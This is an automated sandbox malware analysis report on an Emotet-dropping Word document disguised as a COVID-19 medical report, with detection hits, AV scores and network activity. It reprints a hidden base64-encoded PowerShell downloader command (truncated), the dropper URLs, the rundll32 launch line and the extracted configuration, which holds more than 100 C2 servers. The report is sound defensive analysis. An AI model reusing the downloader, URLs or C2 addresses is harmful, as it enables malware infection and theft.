0000000A.00000002.2149683472.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000009.00000002.2133987769.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000B.00000002.2156224518.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author
11.2.rundll32.exe.1d0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.10000000.8.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.150000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.290000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.10000000.11.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.1c0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.200000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.10000000.8.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.180000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.10000000.8.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.1c0000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.10000000.8.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.250000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.10000000.8.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.230000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.290000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.230000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.10000000.12.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.10000000.12.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.1a0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.170000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.10000000.11.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.10000000.8.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.700000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.150000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.180000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.200000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.1d0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.160000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.170000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.1a0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.250000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.700000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.10000000.12.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.10000000.12.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.160000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 31 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2296, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1, ProcessId: 2700

Sigma detected: Suspicious Encoded PowerShell Command Line

Show sources

Source: Process started

Author: Florian Roth, Markus Neis: Data: Command: powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACAAJwArACcAWwAgACcAKwAoACcAc

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://cab.mykfn.com/admin/X/	Avira URL Cloud: Label: malware
Source: http://gocphongthe.com/wp-content/lMMC/	Avira URL Cloud: Label: malware
Source: http://ie-best.net/online-timer-kvhxz/ilXL/	Avira URL Cloud: Label: malware
Source: http://www.letscompareonline.com/de.letscompareonline.com/wYd/	Avira URL Cloud: Label: malware
Source: http://bhaktivrind.com/cgi-bin/JBbb8/	Avira URL Cloud: Label: malware
Source: http://vanddnabhargave.com/asset/W9o/	Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 11.2.rundll32.exe.200000.1.unpack

Malware Configuration Extractor: Emotet {"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB", "C2 list": ["69.38.130.14:80", "195.159.28.230:8080", "162.241.204.233:8080", "115.21.224.117:80", "78.189.148.42:80", "181.165.68.127:80", "78.188.225.105:80", "161.0.153.60:80", "89.106.251.163:80", "172.125.40.123:80", "5.39.91.110:7080", "110.145.11.73:80", "190.251.200.206:80", "144.217.7.207:7080", "75.109.111.18:80", "75.177.207.146:80", "139.59.60.244:8080", "70.183.211.3:80", "95.213.236.64:8080", "61.19.246.238:443", "174.118.202.24:443", "71.72.196.159:80", "138.68.87.218:443", "24.164.79.147:8080", "49.205.182.134:80", "24.231.88.85:80", "121.124.124.40:7080", "95.9.5.93:80", "118.83.154.64:443", "78.24.219.147:8080", "104.131.11.150:443", "85.105.205.77:8080", "108.53.88.101:443", "187.161.206.24:80", "203.153.216.189:7080", "37.187.72.193:8080", "185.94.252.104:443", "157.245.99.39:8080", "50.91.114.38:80", "87.106.139.101:8080", "74.128.121.17:80", "62.75.141.82:80", "37.139.21.175:8080", "190.103.228.24:80", "134.209.144.106:443", "78.182.254.231:80", "186.74.215.34:80", "180.222.161.85:80", "69.49.88.46:80", "202.134.4.211:8080", "75.113.193.72:80", "139.162.60.124:8080", "79.137.83.50:443", "123.176.25.234:80", "172.105.13.66:443", "93.146.48.84:80", "109.116.245.80:80", "41.185.28.84:8080", "98.109.133.80:80", "194.190.67.75:80", "110.145.101.66:443", "136.244.110.184:8080", "24.179.13.119:80", "89.216.122.92:80", "139.99.158.11:443", "172.86.188.251:8080", "74.40.205.197:443", "62.171.142.179:8080", "167.114.153.111:8080", "119.59.116.21:8080", "74.58.215.226:80", "188.165.214.98:8080", "172.104.97.173:8080", "197.211.245.21:80", "66.57.108.14:443", "188.219.31.12:80", "168.235.67.138:7080", "24.69.65.8:8080", "173.70.61.180:80", "110.142.236.207:80", "51.89.36.180:443", "46.105.131.79:8080", "194.4.58.192:7080", "220.245.198.194:80", "109.74.5.95:8080", "24.178.90.49:80", "181.171.209.241:443", "59.21.235.119:80", "94.23.237.171:443", "12.175.220.98:80", "217.20.166.178:7080", "50.116.111.59:8080", "176.111.60.55:8080", "200.116.145.225:443", "120.150.60.189:80", "185.201.9.197:8080", "202.134.4.216:8080", "120.150.218.241:443", "2.58.16.89:8080", "70.92.118.112:80", "74.208.45.104:8080", "79.130.130.240:8080", "190.240.194.77:443", "85.105.111.166:80", "115.94.207.99:443"]}

Multi AV Scanner detection for domain / URL

Show sources

Source: vanddnabhargave.com

Virustotal: Detection: 5%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll	Metadefender: Detection: 45%			Perma Link
Source: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll	ReversingLabs: Detection: 93%

Multi AV Scanner detection for submitted file

Show sources

Source: IU-8549 Medical report COVID-19.doc	Virustotal: Detection: 63%	Perma Link
Source: IU-8549 Medical report COVID-19.doc	Metadefender: Detection: 56%	Perma Link
Source: IU-8549 Medical report COVID-19.doc	ReversingLabs: Detection: 82%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll

Joe Sandbox ML: detected

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:	Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source:	Binary string: System.pdb* source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source:	Binary string: <ystem.pdb@) source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2098556907.00000000027F0000.00000002.00000001.sdmp
Source:	Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp

Spreading:

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Source: global traffic

DNS query: name: cab.mykfn.com

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 166.62.28.130:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 166.62.28.130:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2404322 ET CNC Feodo Tracker Reported CnC Server TCP group 12 192.168.2.22:49171 -> 195.159.28.230:8080
Source: Traffic	Snort IDS: 2404310 ET CNC Feodo Tracker Reported CnC Server TCP group 6 192.168.2.22:49173 -> 162.241.204.233:8080
Source: Traffic	Snort IDS: 2404304 ET CNC Feodo Tracker Reported CnC Server TCP group 3 192.168.2.22:49175 -> 115.21.224.117:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 69.38.130.14:80
Source: Malware configuration extractor	IPs: 195.159.28.230:8080
Source: Malware configuration extractor	IPs: 162.241.204.233:8080
Source: Malware configuration extractor	IPs: 115.21.224.117:80
Source: Malware configuration extractor	IPs: 78.189.148.42:80
Source: Malware configuration extractor	IPs: 181.165.68.127:80
Source: Malware configuration extractor	IPs: 78.188.225.105:80
Source: Malware configuration extractor	IPs: 161.0.153.60:80
Source: Malware configuration extractor	IPs: 89.106.251.163:80
Source: Malware configuration extractor	IPs: 172.125.40.123:80
Source: Malware configuration extractor	IPs: 5.39.91.110:7080
Source: Malware configuration extractor	IPs: 110.145.11.73:80
Source: Malware configuration extractor	IPs: 190.251.200.206:80
Source: Malware configuration extractor	IPs: 144.217.7.207:7080
Source: Malware configuration extractor	IPs: 75.109.111.18:80
Source: Malware configuration extractor	IPs: 75.177.207.146:80
Source: Malware configuration extractor	IPs: 139.59.60.244:8080
Source: Malware configuration extractor	IPs: 70.183.211.3:80
Source: Malware configuration extractor	IPs: 95.213.236.64:8080
Source: Malware configuration extractor	IPs: 61.19.246.238:443
Source: Malware configuration extractor	IPs: 174.118.202.24:443
Source: Malware configuration extractor	IPs: 71.72.196.159:80
Source: Malware configuration extractor	IPs: 138.68.87.218:443
Source: Malware configuration extractor	IPs: 24.164.79.147:8080
Source: Malware configuration extractor	IPs: 49.205.182.134:80
Source: Malware configuration extractor	IPs: 24.231.88.85:80
Source: Malware configuration extractor	IPs: 121.124.124.40:7080
Source: Malware configuration extractor	IPs: 95.9.5.93:80
Source: Malware configuration extractor	IPs: 118.83.154.64:443
Source: Malware configuration extractor	IPs: 78.24.219.147:8080
Source: Malware configuration extractor	IPs: 104.131.11.150:443
Source: Malware configuration extractor	IPs: 85.105.205.77:8080
Source: Malware configuration extractor	IPs: 108.53.88.101:443
Source: Malware configuration extractor	IPs: 187.161.206.24:80
Source: Malware configuration extractor	IPs: 203.153.216.189:7080
Source: Malware configuration extractor	IPs: 37.187.72.193:8080
Source: Malware configuration extractor	IPs: 185.94.252.104:443
Source: Malware configuration extractor	IPs: 157.245.99.39:8080
Source: Malware configuration extractor	IPs: 50.91.114.38:80
Source: Malware configuration extractor	IPs: 87.106.139.101:8080
Source: Malware configuration extractor	IPs: 74.128.121.17:80
Source: Malware configuration extractor	IPs: 62.75.141.82:80
Source: Malware configuration extractor	IPs: 37.139.21.175:8080
Source: Malware configuration extractor	IPs: 190.103.228.24:80
Source: Malware configuration extractor	IPs: 134.209.144.106:443
Source: Malware configuration extractor	IPs: 78.182.254.231:80
Source: Malware configuration extractor	IPs: 186.74.215.34:80
Source: Malware configuration extractor	IPs: 180.222.161.85:80
Source: Malware configuration extractor	IPs: 69.49.88.46:80
Source: Malware configuration extractor	IPs: 202.134.4.211:8080
Source: Malware configuration extractor	IPs: 75.113.193.72:80
Source: Malware configuration extractor	IPs: 139.162.60.124:8080
Source: Malware configuration extractor	IPs: 79.137.83.50:443
Source: Malware configuration extractor	IPs: 123.176.25.234:80
Source: Malware configuration extractor	IPs: 172.105.13.66:443
Source: Malware configuration extractor	IPs: 93.146.48.84:80
Source: Malware configuration extractor	IPs: 109.116.245.80:80
Source: Malware configuration extractor	IPs: 41.185.28.84:8080
Source: Malware configuration extractor	IPs: 98.109.133.80:80
Source: Malware configuration extractor	IPs: 194.190.67.75:80
Source: Malware configuration extractor	IPs: 110.145.101.66:443
Source: Malware configuration extractor	IPs: 136.244.110.184:8080
Source: Malware configuration extractor	IPs: 24.179.13.119:80
Source: Malware configuration extractor	IPs: 89.216.122.92:80
Source: Malware configuration extractor	IPs: 139.99.158.11:443
Source: Malware configuration extractor	IPs: 172.86.188.251:8080
Source: Malware configuration extractor	IPs: 74.40.205.197:443
Source: Malware configuration extractor	IPs: 62.171.142.179:8080
Source: Malware configuration extractor	IPs: 167.114.153.111:8080
Source: Malware configuration extractor	IPs: 119.59.116.21:8080
Source: Malware configuration extractor	IPs: 74.58.215.226:80
Source: Malware configuration extractor	IPs: 188.165.214.98:8080
Source: Malware configuration extractor	IPs: 172.104.97.173:8080
Source: Malware configuration extractor	IPs: 197.211.245.21:80
Source: Malware configuration extractor	IPs: 66.57.108.14:443
Source: Malware configuration extractor	IPs: 188.219.31.12:80
Source: Malware configuration extractor	IPs: 168.235.67.138:7080
Source: Malware configuration extractor	IPs: 24.69.65.8:8080
Source: Malware configuration extractor	IPs: 173.70.61.180:80
Source: Malware configuration extractor	IPs: 110.142.236.207:80
Source: Malware configuration extractor	IPs: 51.89.36.180:443
Source: Malware configuration extractor	IPs: 46.105.131.79:8080
Source: Malware configuration extractor	IPs: 194.4.58.192:7080
Source: Malware configuration extractor	IPs: 220.245.198.194:80
Source: Malware configuration extractor	IPs: 109.74.5.95:8080
Source: Malware configuration extractor	IPs: 24.178.90.49:80
Source: Malware configuration extractor	IPs: 181.171.209.241:443
Source: Malware configuration extractor	IPs: 59.21.235.119:80
Source: Malware configuration extractor	IPs: 94.23.237.171:443
Source: Malware configuration extractor	IPs: 12.175.220.98:80
Source: Malware configuration extractor	IPs: 217.20.166.178:7080
Source: Malware configuration extractor	IPs: 50.116.111.59:8080
Source: Malware configuration extractor	IPs: 176.111.60.55:8080
Source: Malware configuration extractor	IPs: 200.116.145.225:443
Source: Malware configuration extractor	IPs: 120.150.60.189:80
Source: Malware configuration extractor	IPs: 185.201.9.197:8080
Source: Malware configuration extractor	IPs: 202.134.4.216:8080
Source: Malware configuration extractor	IPs: 120.150.218.241:443
Source: Malware configuration extractor	IPs: 2.58.16.89:8080
Source: Malware configuration extractor	IPs: 70.92.118.112:80
Source: Malware configuration extractor	IPs: 74.208.45.104:8080
Source: Malware configuration extractor	IPs: 79.130.130.240:8080
Source: Malware configuration extractor	IPs: 190.240.194.77:443
Source: Malware configuration extractor	IPs: 85.105.111.166:80
Source: Malware configuration extractor	IPs: 115.94.207.99:443

Potential dropper URLs found in powershell memory

Show sources

Source: powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmp

String found in memory: http://cab.mykfn.com/admin/X/!http://bhaktivrind.com/cgi-bin/JBbb8/!http://vanddnabhargave.com/asset/W9o/!http://ie-best.net/online-timer-kvhxz/ilXL/!http://gocphongthe.com/wp-content/lMMC/!http://www.letscompareonline.com/de.letscompareonline.com/wYd/!http://cambiasuhistoria.growlab.es/wp-content/hGhY2/

Source: unknown

Network traffic detected: IP country count 30

Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 195.159.28.230:8080
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 162.241.204.233:8080

Source: global traffic	HTTP traffic detected: GET /cgi-bin/JBbb8/ HTTP/1.1Host: bhaktivrind.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /asset/W9o/ HTTP/1.1Host: vanddnabhargave.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /online-timer-kvhxz/ilXL/ HTTP/1.1Host: ie-best.netConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 71.72.196.159 71.72.196.159
Source: Joe Sandbox View	IP Address: 71.72.196.159 71.72.196.159

Source: Joe Sandbox View	ASN Name: HOSTER-KZ HOSTER-KZ
Source: Joe Sandbox View	ASN Name: BEAMTELE-AS-APAtriaConvergenceTechnologiespvtltdIN BEAMTELE-AS-APAtriaConvergenceTechnologiespvtltdIN
Source: Joe Sandbox View	ASN Name: TTNETTR TTNETTR

Source: unknown	TCP traffic detected without corresponding DNS query: 69.38.130.14
Source: unknown	TCP traffic detected without corresponding DNS query: 69.38.130.14
Source: unknown	TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown	TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown	TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown	TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown	TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown	TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown	TCP traffic detected without corresponding DNS query: 162.241.204.233
Source: unknown	TCP traffic detected without corresponding DNS query: 162.241.204.233
Source: unknown	TCP traffic detected without corresponding DNS query: 162.241.204.233
Source: unknown	TCP traffic detected without corresponding DNS query: 162.241.204.233
Source: unknown	TCP traffic detected without corresponding DNS query: 162.241.204.233
Source: unknown	TCP traffic detected without corresponding DNS query: 162.241.204.233
Source: unknown	TCP traffic detected without corresponding DNS query: 115.21.224.117
Source: unknown	TCP traffic detected without corresponding DNS query: 115.21.224.117

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B4FD77F3-97C0-4A14-814E-1968BCE52029}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /cgi-bin/JBbb8/ HTTP/1.1Host: bhaktivrind.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /asset/W9o/ HTTP/1.1Host: vanddnabhargave.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /online-timer-kvhxz/ilXL/ HTTP/1.1Host: ie-best.netConnection: Keep-Alive

Source: rundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: cab.mykfn.com

Source: global traffic

